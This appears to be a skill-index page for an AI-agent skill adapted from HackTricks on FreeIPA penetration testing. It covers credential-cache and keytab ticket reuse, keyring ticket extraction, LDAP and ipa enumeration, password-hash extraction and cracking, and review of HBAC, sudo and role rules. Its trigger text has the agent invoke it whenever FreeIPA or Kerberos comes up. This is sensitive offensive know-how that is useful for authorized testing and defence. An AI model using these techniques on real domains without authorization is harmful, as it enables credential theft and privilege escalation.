OpenSkillIndex← back to search

Hacktricks-skills freeipa-pentesting

FreeIPA penetration testing and enumeration. Use this skill whenever the user mentions FreeIPA, Kerberos on Unix, LDAP enumeration, IPA domain attacks, or any Active Directory-like infrastructure on Linux/Unix systems. This skill covers authentication, enumeration, hash extraction, and privilege escalation techniques for FreeIPA environments.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/linux-hardening/freeipa-pentesting/SKILL.MD
source content

FreeIPA Pentesting

FreeIPA is an open-source alternative to Microsoft Windows Active Directory for Unix environments. It combines LDAP directory with MIT Kerberos KDC for domain management similar to Active Directory.

When to Use This Skill

Use this skill when:

  • You need to enumerate or attack a FreeIPA domain
  • You're working with Kerberos authentication on Linux/Unix
  • You need to extract or crack FreeIPA password hashes
  • You're investigating HBAC rules, sudo rules, or role-based access control in FreeIPA
  • You're doing privilege escalation in a FreeIPA environment

Quick Reference

Key Files

  • /etc/krb5.conf
    - Kerberos client configuration
  • /etc/ipa/default.conf
    - IPA client/server defaults
  • /etc/krb5.keytab
    - Kerberos keytab for authentication

Key Binaries

  • ipa
    - FreeIPA management tool
  • kinit
    , 
    klist
    , 
    kdestroy
    - Kerberos ticket management
  • kpasswd
    , 
    ksu
    , 
    kswitch
    , 
    kvno
    - Additional Kerberos utilities

Environment Variables

  • KRB5CCNAME
    - Points to CCACHE ticket file
  • KRB5_KTNAME
    - Points to keytab file
  • KRB5_CONFIG
    - Custom krb5.conf location

Authentication

CCACHE Tickets

CCACHE files store Kerberos credentials in binary format, typically in 

/tmp
with 600 permissions.

# Parse a CCACHE ticket
klist

# Re-use a CCACHE ticket
export KRB5CCNAME=/path/to/ticket.ccache

Unix Keyring

Tickets can also be stored in the Linux keyring with various scopes:

  • KEYRING:name
  • KEYRING:process:name
  • KEYRING:thread:name
  • KEYRING:session:name
  • KEYRING:persistent:uidnumber

Use Tickey to extract tickets from the keyring.

Keytab Files

Keytab files contain Kerberos principals and encrypted keys, allowing TGT acquisition without passwords.

# Parse keytab
klist -k /etc/krb5.keytab

# Use keytab for authentication
kinit -kt /etc/krb5.keytab principal@DOMAIN

Enumeration

Anonymous LDAP Enumeration

FreeIPA often allows anonymous binds, exposing significant data without authentication.

# Enumerate all available data
ldapsearch -x

Authenticated Enumeration

With valid Kerberos tickets, you can query specific objects.

# Get all users
ldapsearch -Y gssapi -b "cn=users,cn=compat,dc=domain,dc=local"

# Get user groups
ldapsearch -Y gssapi -b "cn=groups,cn=accounts,dc=domain,dc=local"

# Get all hosts
ldapsearch -Y gssapi -b "cn=computers,cn=accounts,dc=domain,dc=local"

# Get host groups
ldapsearch -Y gssapi -b "cn=hostgroups,cn=accounts,dc=domain,dc=local"

Using IPA Binaries

From a domain-joined machine, use the 

ipa
command for enumeration.

ipa user-find
ipa usergroup-find
ipa host-find
ipa host-group-find

# Show detailed info
ipa user-show <username> --all
ipa usergroup-show <group> --all
ipa host-show <host> --all
ipa hostgroup-show <group> --all

Note: The 

admin
user in FreeIPA is equivalent to Domain Admins in Active Directory.

Hash Extraction

The root user on the IPA server can access password hashes stored in base64 format within the 

userPassword
attribute.

  • SSHA512 - Old FreeIPA versions
  • PBKDF2_SHA256 - New FreeIPA versions
  • ipaNTHash - AD integration (NT hash in base64)
# Extract hashes using dbscan (requires root on IPA server)
dbscan -c /var/lib/ipa/...

Hash Cracking Workflow

  1. Decode base64 from the attribute
  2. For NT hash (AD integration): Re-encode as ASCII hex, then use John/hashcat
  3. For SSHA512: Extract the hash portion, use John/hashcat
  4. For PBKDF2_SHA256: Use first 256 bits (32 bytes) with John/hashcat

HBAC Rules

Host-Based Access Control rules define what permissions users and hosts have over domain resources.

# Enumerate HBAC rules
ldapsearch -Y gssapi -b "cn=hbac,dc=domain,dc=local"
ipa hbacrule-find
ipa hbacrule-show <rule> --all

Sudo Rules

Sudo rules control which commands can be executed with elevated privileges across the domain.

# Enumerate sudo rules
ldapsearch -Y gssapi -b "cn=sudorules,cn=sudo,dc=domain,dc=local"
ipa sudorule-find
ipa sudorule-show <rule> --all

Role-Based Access Control

Roles bundle together privileges and permissions that can be assigned to users, groups, hosts, and services.

# Enumerate roles, privileges, and permissions
ipa role-find
ipa role-show <role> --all
ipa privilege-find
ipa privilege-show <privilege> --all
ipa permission-find
ipa permission-show <permission> --all

Tools

Linikatz

References